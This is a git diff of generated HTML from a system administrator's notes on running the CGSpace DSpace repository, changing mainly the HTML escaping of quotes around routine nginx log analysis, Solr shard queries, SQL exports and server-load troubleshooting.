(&lt;Literal &quot;fish catching&quot;@en&gt;,)
(&lt;Literal &quot;fish harvesting&quot;@en&gt;,)
(&lt;Literal &quot;fish meat&quot;@en&gt;,)
(&lt;Literal &quot;fish roe&quot;@en&gt;,)
(&lt;Literal &quot;fish conversion&quot;@en&gt;,)
(&lt;Literal &quot;fisheries catches (composition)&quot;@en&gt;,)
(&lt;Literal &quot;fishtail palm&quot;@en&gt;,)
(&lt;Literal &quot;fishflies&quot;@en&gt;,)
(&lt;Literal &quot;fishery biology&quot;@en&gt;,)
(&lt;Literal &quot;fish production&quot;@en&gt;,)
(&lt;Literal &#34;fish catching&#34;@en&gt;,)
(&lt;Literal &#34;fish harvesting&#34;@en&gt;,)
(&lt;Literal &#34;fish meat&#34;@en&gt;,)
(&lt;Literal &#34;fish roe&#34;@en&gt;,)
(&lt;Literal &#34;fish conversion&#34;@en&gt;,)
(&lt;Literal &#34;fisheries catches (composition)&#34;@en&gt;,)
(&lt;Literal &#34;fishtail palm&#34;@en&gt;,)
(&lt;Literal &#34;fishflies&#34;@en&gt;,)
(&lt;Literal &#34;fishery biology&#34;@en&gt;,)
(&lt;Literal &#34;fish production&#34;@en&gt;,)
</code></pre><ul>
<li>The SPARQL query comes from my notes in <a href="/cgspace-notes/2017-08/">2017-08</a></li>
</ul>
@ -466,7 +466,7 @@ In [14]: for row in result.fetchone():
</li>
<li>I am testing the speed of the WorldFish DSpace repository&rsquo;s REST API and it&rsquo;s five to ten times faster than CGSpace as I tested in <a href="/cgspace-notes/2018-10/">2018-10</a>:</li>
</ul>
<pre tabindex="0"><code>$ time http --print h 'https://digitalarchive.worldfishcenter.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0'
<pre tabindex="0"><code>$ time http --print h &#39;https://digitalarchive.worldfishcenter.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0&#39;
0.16s user 0.03s system 3% cpu 5.185 total
0.17s user 0.02s system 2% cpu 7.123 total
@ -474,7 +474,7 @@ In [14]: for row in result.fetchone():
</code></pre><ul>
<li>In other news, Linode sent a mail last night that the CPU load on CGSpace (linode18) was high, here are the top IPs in the logs around those few hours:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;14/Jan/2019:(17|18|19|20)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;14/Jan/2019:(17|18|19|20)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
157 31.6.77.23
192 54.70.40.11
202 66.249.64.157
@ -651,7 +651,7 @@ Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed
at org.apache.solr.update.DefaultSolrCoreState.getIndexWriter(DefaultSolrCoreState.java:111)
at org.apache.solr.core.SolrCore.openNewSearcher(SolrCore.java:1528)
... 33 more
2019-01-16 13:37:55,401 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2018': Unable to create core [statistics-2018] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
2019-01-16 13:37:55,401 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore &#39;statistics-2018&#39;: Unable to create core [statistics-2018] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
at org.apache.solr.handler.admin.CoreAdminHandler.handleCreateAction(CoreAdminHandler.java:613)
at org.apache.solr.handler.admin.CoreAdminHandler.handleRequestInternal(CoreAdminHandler.java:199)
at org.apache.solr.handler.admin.CoreAdminHandler.handleRequestBody(CoreAdminHandler.java:188)
@ -721,7 +721,7 @@ Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed
<li>For 2019-01 alone the Usage Stats are already around 1.2 million</li>
<li>I tried to look in the nginx logs to see how many raw requests there are so far this month and it&rsquo;s about 1.4 million:</li>
</ul>
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Jan/2019&quot;
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34;
1442874
real 0m17.161s
@ -859,30 +859,30 @@ WantedBy=multi-user.target
<li>I think I might manage this the same way I do the restic releases in the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure scripts</a>, where I download a specific version and symlink to some generic location without the version number</li>
<li>I verified that there is indeed an issue with sharded Solr statistics cores on DSpace, which will cause inaccurate results in the dspace-statistics-api:</li>
</ul>
<pre tabindex="0"><code>$ http 'http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view' | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;33&quot; start=&quot;0&quot;&gt;
$ http 'http://localhost:3000/solr/statistics-2018/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view' | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;241&quot; start=&quot;0&quot;&gt;
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view&#39; | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;33&#34; start=&#34;0&#34;&gt;
$ http &#39;http://localhost:3000/solr/statistics-2018/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view&#39; | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;241&#34; start=&#34;0&#34;&gt;
</code></pre><ul>
<li>I opened an issue on the GitHub issue tracker (<a href="https://github.com/ilri/dspace-statistics-api/issues/10">#10</a>)</li>
<li>I don&rsquo;t think the <a href="https://solrclient.readthedocs.io/en/latest/">SolrClient library</a> we are currently using supports these type of queries so we might have to just do raw queries with requests</li>
<li>The <a href="https://github.com/django-haystack/pysolr">pysolr</a> library says it supports multicore indexes, but I am not sure it does (or at least not with our setup):</li>
</ul>
<pre tabindex="0"><code>import pysolr
solr = pysolr.Solr('http://localhost:3000/solr/statistics')
results = solr.search('type:2', **{'fq': 'isBot:false AND statistics_type:view', 'facet': 'true', 'facet.field': 'id', 'facet.mincount': 1, 'facet.limit': 10, 'facet.offset': 0, 'rows': 0})
print(results.facets['facet_fields'])
{'id': ['77572', 646, '93185', 380, '92932', 375, '102499', 372, '101430', 337, '77632', 331, '102449', 289, '102485', 276, '100849', 270, '47080', 260]}
solr = pysolr.Solr(&#39;http://localhost:3000/solr/statistics&#39;)
results = solr.search(&#39;type:2&#39;, **{&#39;fq&#39;: &#39;isBot:false AND statistics_type:view&#39;, &#39;facet&#39;: &#39;true&#39;, &#39;facet.field&#39;: &#39;id&#39;, &#39;facet.mincount&#39;: 1, &#39;facet.limit&#39;: 10, &#39;facet.offset&#39;: 0, &#39;rows&#39;: 0})
print(results.facets[&#39;facet_fields&#39;])
{&#39;id&#39;: [&#39;77572&#39;, 646, &#39;93185&#39;, 380, &#39;92932&#39;, 375, &#39;102499&#39;, 372, &#39;101430&#39;, 337, &#39;77632&#39;, 331, &#39;102449&#39;, 289, &#39;102485&#39;, 276, &#39;100849&#39;, 270, &#39;47080&#39;, 260]}
</code></pre><ul>
<li>If I double check one item from above, for example <code>77572</code>, it appears this is only working on the current statistics core and not the shards:</li>
</ul>
<pre tabindex="0"><code>import pysolr
solr = pysolr.Solr('http://localhost:3000/solr/statistics')
results = solr.search('type:2 id:77572', **{'fq': 'isBot:false AND statistics_type:view'})
solr = pysolr.Solr(&#39;http://localhost:3000/solr/statistics&#39;)
results = solr.search(&#39;type:2 id:77572&#39;, **{&#39;fq&#39;: &#39;isBot:false AND statistics_type:view&#39;})
print(results.hits)
646
solr = pysolr.Solr('http://localhost:3000/solr/statistics-2018/')
results = solr.search('type:2 id:77572', **{'fq': 'isBot:false AND statistics_type:view'})
solr = pysolr.Solr(&#39;http://localhost:3000/solr/statistics-2018/&#39;)
results = solr.search(&#39;type:2 id:77572&#39;, **{&#39;fq&#39;: &#39;isBot:false AND statistics_type:view&#39;})
print(results.hits)
595
</code></pre><ul>
@ -894,13 +894,13 @@ print(results.hits)
<li>I think I figured out how to search across shards, I needed to give the whole URL to each other core</li>
<li>Now I get more results when I start adding the other statistics cores:</li>
</ul>
<pre tabindex="0"><code>$ http 'http://localhost:3000/solr/statistics/select?&amp;indent=on&amp;rows=0&amp;q=*:*' | grep numFound&lt;result name=&quot;response&quot; numFound=&quot;2061320&quot; start=&quot;0&quot;&gt;
$ http 'http://localhost:3000/solr/statistics/select?&amp;shards=localhost:8081/solr/statistics-2018&amp;indent=on&amp;rows=0&amp;q=*:*' | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;16280292&quot; start=&quot;0&quot; maxScore=&quot;1.0&quot;&gt;
$ http 'http://localhost:3000/solr/statistics/select?&amp;shards=localhost:8081/solr/statistics-2018,localhost:8081/solr/statistics-2017&amp;indent=on&amp;rows=0&amp;q=*:*' | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;25606142&quot; start=&quot;0&quot; maxScore=&quot;1.0&quot;&gt;
$ http 'http://localhost:3000/solr/statistics/select?&amp;shards=localhost:8081/solr/statistics-2018,localhost:8081/solr/statistics-2017,localhost:8081/solr/statistics-2016&amp;indent=on&amp;rows=0&amp;q=*:*' | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;31532212&quot; start=&quot;0&quot; maxScore=&quot;1.0&quot;&gt;
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?&amp;indent=on&amp;rows=0&amp;q=*:*&#39; | grep numFound&lt;result name=&#34;response&#34; numFound=&#34;2061320&#34; start=&#34;0&#34;&gt;
$ http &#39;http://localhost:3000/solr/statistics/select?&amp;shards=localhost:8081/solr/statistics-2018&amp;indent=on&amp;rows=0&amp;q=*:*&#39; | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;16280292&#34; start=&#34;0&#34; maxScore=&#34;1.0&#34;&gt;
$ http &#39;http://localhost:3000/solr/statistics/select?&amp;shards=localhost:8081/solr/statistics-2018,localhost:8081/solr/statistics-2017&amp;indent=on&amp;rows=0&amp;q=*:*&#39; | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;25606142&#34; start=&#34;0&#34; maxScore=&#34;1.0&#34;&gt;
$ http &#39;http://localhost:3000/solr/statistics/select?&amp;shards=localhost:8081/solr/statistics-2018,localhost:8081/solr/statistics-2017,localhost:8081/solr/statistics-2016&amp;indent=on&amp;rows=0&amp;q=*:*&#39; | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;31532212&#34; start=&#34;0&#34; maxScore=&#34;1.0&#34;&gt;
</code></pre><ul>
<li>I should be able to modify the dspace-statistics-api to check the shards via the Solr core status, then add the <code>shards</code> parameter to each query to make the search distributed among the cores</li>
<li>I implemented a proof of concept to query the Solr STATUS for active cores and to add them with a <code>shards</code> query string</li>
@ -913,10 +913,10 @@ $ http 'http://localhost:3000/solr/statistics/select?&amp;shards=localhost:8081/
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ http 'http://localhost:8081/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view&amp;shards=localhost:8081/solr/statistics,localhost:8081/solr/statistics-2018' | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;275&quot; start=&quot;0&quot; maxScore=&quot;12.205825&quot;&gt;
$ http 'http://localhost:8081/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view&amp;shards=localhost:8081/solr/statistics-2018' | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;241&quot; start=&quot;0&quot; maxScore=&quot;12.205825&quot;&gt;
<pre tabindex="0"><code>$ http &#39;http://localhost:8081/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view&amp;shards=localhost:8081/solr/statistics,localhost:8081/solr/statistics-2018&#39; | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;275&#34; start=&#34;0&#34; maxScore=&#34;12.205825&#34;&gt;
$ http &#39;http://localhost:8081/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view&amp;shards=localhost:8081/solr/statistics-2018&#39; | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;241&#34; start=&#34;0&#34; maxScore=&#34;12.205825&#34;&gt;
</code></pre><h2 id="2019-01-22">2019-01-22</h2>
<ul>
<li>Release <a href="https://github.com/ilri/dspace-statistics-api/releases/tag/v0.9.0">version 0.9.0 of the dspace-statistics-api</a> to address the issue of querying multiple Solr statistics shards</li>
@ -924,7 +924,7 @@ $ http 'http://localhost:8081/solr/statistics/select?indent=on&amp;rows=0&amp;q=
<li>I deployed it on CGSpace (linode18) and restarted the indexer as well</li>
<li>Linode sent an alert that CGSpace (linode18) was using high CPU this afternoon, the top ten IPs during that time were:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;22/Jan/2019:1(4|5|6)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;22/Jan/2019:1(4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
155 40.77.167.106
176 2003:d5:fbda:1c00:1106:c7a0:4b17:3af8
189 107.21.16.70
@ -979,13 +979,13 @@ $ http 'http://localhost:8081/solr/statistics/select?indent=on&amp;rows=0&amp;q=
<p>I got a list of their collections from the CGSpace XMLUI and then used an SQL query to dump the unique values to CSV:</p>
</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/35501', '10568/41728', '10568/49622', '10568/56589', '10568/56592', '10568/65064', '10568/65718', '10568/65719', '10568/67373', '10568/67731', '10568/68235', '10568/68546', '10568/69089', '10568/69160', '10568/69419', '10568/69556', '10568/70131', '10568/70252', '10568/70978'))) group by text_value order by count desc) to /tmp/bioversity-affiliations.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;affiliation&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/35501&#39;, &#39;10568/41728&#39;, &#39;10568/49622&#39;, &#39;10568/56589&#39;, &#39;10568/56592&#39;, &#39;10568/65064&#39;, &#39;10568/65718&#39;, &#39;10568/65719&#39;, &#39;10568/67373&#39;, &#39;10568/67731&#39;, &#39;10568/68235&#39;, &#39;10568/68546&#39;, &#39;10568/69089&#39;, &#39;10568/69160&#39;, &#39;10568/69419&#39;, &#39;10568/69556&#39;, &#39;10568/70131&#39;, &#39;10568/70252&#39;, &#39;10568/70978&#39;))) group by text_value order by count desc) to /tmp/bioversity-affiliations.csv with csv;
COPY 1109
</code></pre><ul>
<li>Send a mail to the dspace-tech mailing list about the OpenSearch issue we had with the Livestock CRP</li>
<li>Linode sent an alert that CGSpace (linode18) had a high load this morning, here are the top ten IPs during that time:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;23/Jan/2019:0(4|5|6)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;23/Jan/2019:0(4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
222 54.226.25.74
241 40.77.167.13
272 46.101.86.248
@ -1038,13 +1038,13 @@ $ schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace fi
zsh: abort (core dumped) identify Food\ safety\ Kenya\ fruits.pdf\[0\]
$ identify Food\ safety\ Kenya\ fruits.pdf\[0\]
Food safety Kenya fruits.pdf[0]=&gt;Food safety Kenya fruits.pdf PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.000u 0:00.000
identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/1747.
identify: CorruptImageProfile `xmp&#39; @ warning/profile.c/SetImageProfileInternal/1747.
</code></pre><ul>
<li>I reported it to the Arch Linux bug tracker (<a href="https://bugs.archlinux.org/task/61513">61513</a>)</li>
<li>I told Atmire to go ahead with the Metadata Quality Module addition based on our <code>5_x-dev</code> branch (<a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=657">657</a>)</li>
<li>Linode sent alerts last night to say that CGSpace (linode18) was using high CPU last night, here are the top ten IPs from the nginx logs around that time:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;23/Jan/2019:(18|19|20)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;23/Jan/2019:(18|19|20)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
305 3.81.136.184
306 3.83.14.11
306 52.54.252.47
@ -1059,7 +1059,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
<li>45.5.186.2 is CIAT and 66.249.64.155 is Google&hellip; hmmm.</li>
<li>Linode sent another alert this morning, here are the top ten IPs active during that time:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;24/Jan/2019:0(4|5|6)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;24/Jan/2019:0(4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
360 3.89.134.93
362 34.230.15.139
366 100.24.48.177
@ -1073,7 +1073,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
</code></pre><ul>
<li>Just double checking what CIAT is doing, they are mainly hitting the REST API:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;24/Jan/2019:&quot; | grep 45.5.186.2 | grep -Eo &quot;GET /(handle|bitstream|rest|oai)/&quot; | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;24/Jan/2019:&#34; | grep 45.5.186.2 | grep -Eo &#34;GET /(handle|bitstream|rest|oai)/&#34; | sort | uniq -c | sort -n
</code></pre><ul>
<li>CIAT&rsquo;s community currently has 12,000 items in it so this is normal</li>
<li>The issue with goo.gl links that we saw yesterday appears to be resolved, as links are working again&hellip;</li>
@ -1102,7 +1102,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
<ul>
<li>Linode sent an email that the server was using a lot of CPU this morning, and these were the top IPs in the web server logs at the time:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;27/Jan/2019:0(6|7|8)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;27/Jan/2019:0(6|7|8)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
189 40.77.167.108
191 157.55.39.2
263 34.218.226.147
@ -1132,7 +1132,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
</li>
<li>Linode alerted that CGSpace (linode18) was using too much CPU again this morning, here are the active IPs from the web server log at the time:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;28/Jan/2019:0(6|7|8)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;28/Jan/2019:0(6|7|8)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
67 207.46.13.50
105 41.204.190.40
117 34.218.226.147
@ -1153,7 +1153,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
</li>
<li>Last night Linode sent an alert that CGSpace (linode18) was using high CPU, here are the most active IPs in the hours just before, during, and after the alert:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;28/Jan/2019:(17|18|19|20|21)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;28/Jan/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
310 45.5.184.2
425 5.143.231.39
526 54.70.40.11
@ -1173,7 +1173,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
<ul>
<li>Linode sent an alert about CGSpace (linode18) CPU usage this morning, here are the top IPs in the web server logs just before, during, and after the alert:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;29/Jan/2019:0(3|4|5|6|7)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;29/Jan/2019:0(3|4|5|6|7)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
334 45.5.184.72
429 66.249.66.223
522 35.237.175.180
@ -1198,7 +1198,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
<ul>
<li>Got another alert from Linode about CGSpace (linode18) this morning, here are the top IPs before, during, and after the alert:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;30/Jan/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;30/Jan/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
273 46.101.86.248
301 35.237.175.180
334 45.5.184.72
@ -1216,7 +1216,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
<ul>
<li>Linode sent alerts about CGSpace (linode18) last night and this morning, here are the top IPs before, during, and after those times:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;30/Jan/2019:(16|17|18|19|20)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;30/Jan/2019:(16|17|18|19|20)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
436 18.196.196.108
460 157.55.39.168
460 207.46.13.96
@ -1227,7 +1227,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
1601 85.25.237.71
1894 66.249.66.219
2610 45.5.184.2
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;31/Jan/2019:0(2|3|4|5|6)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;31/Jan/2019:0(2|3|4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
318 207.46.13.242
334 45.5.184.72
486 35.237.175.180

View File

@ -12,7 +12,7 @@
Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!
The top IPs before, during, and after this latest alert tonight were:
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;01/Feb/2019:(17|18|19|20|21)&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;01/Feb/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
245 207.46.13.5
332 54.70.40.11
385 5.143.231.38
@ -28,7 +28,7 @@ The top IPs before, during, and after this latest alert tonight were:
The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase
There were just over 3 million accesses in the nginx logs last month:
# time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Jan/2019&quot;
# time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34;
3018243
real 0m19.873s
@ -49,7 +49,7 @@ sys 0m1.979s
Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!
The top IPs before, during, and after this latest alert tonight were:
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;01/Feb/2019:(17|18|19|20|21)&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;01/Feb/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
245 207.46.13.5
332 54.70.40.11
385 5.143.231.38
@ -65,14 +65,14 @@ The top IPs before, during, and after this latest alert tonight were:
The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase
There were just over 3 million accesses in the nginx logs last month:
# time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Jan/2019&quot;
# time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34;
3018243
real 0m19.873s
user 0m22.203s
sys 0m1.979s
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -163,7 +163,7 @@ sys 0m1.979s
<li>Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!</li>
<li>The top IPs before, during, and after this latest alert tonight were:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;01/Feb/2019:(17|18|19|20|21)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;01/Feb/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
245 207.46.13.5
332 54.70.40.11
385 5.143.231.38
@ -179,7 +179,7 @@ sys 0m1.979s
<li>The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase</li>
<li>There were just over 3 million accesses in the nginx logs last month:</li>
</ul>
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Jan/2019&quot;
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34;
3018243
real 0m19.873s
@ -198,7 +198,7 @@ sys 0m1.979s
<ul>
<li>Another alert from Linode about CGSpace (linode18) this morning, here are the top IPs in the web server logs before, during, and after that time:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Feb/2019:0(1|2|3|4|5)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Feb/2019:0(1|2|3|4|5)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
284 18.195.78.144
329 207.46.13.32
417 35.237.175.180
@ -219,7 +219,7 @@ sys 0m1.979s
<li>This is seriously getting annoying, Linode sent another alert this morning that CGSpace (linode18) load was 377%!</li>
<li>Here are the top IPs before, during, and after that time:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
325 85.25.237.71
340 45.5.184.72
431 5.143.231.8
@ -238,7 +238,7 @@ sys 0m1.979s
</code></pre><ul>
<li>This user was making 2060 requests per minute this morning&hellip; seems like I should try to block this type of behavior heuristically, regardless of user agent!</li>
</ul>
